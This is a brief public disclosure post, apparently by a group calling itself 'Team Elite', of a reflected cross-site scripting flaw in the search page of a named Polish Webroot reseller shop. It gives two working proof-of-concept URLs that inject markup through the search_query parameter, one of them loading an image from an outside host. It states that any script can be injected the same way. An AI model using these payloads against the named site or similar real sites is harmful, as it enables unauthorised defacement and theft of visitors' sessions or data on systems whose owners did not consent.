Webroot (polish website) - XSS
Vulnerable page: http://wrpolska.pl/sklep/search.phpPoC:
Code
http://wrpolska.pl/sklep/search.php?orderby=position&orderway=desc&search_query="><h1>XSS found by Team Elite</h1>
Code
http://wrpolska.pl/sklep/search.php?orderby=position&orderway=desc&search_query="><img src=http://te-home.net/images/logo.png>
You can either include any XSS code in search input box, or request any XSS code directly using GET method and search_query parameter.
Note: This is a proof of concept and it doesn't reflect the views or interests of above websites.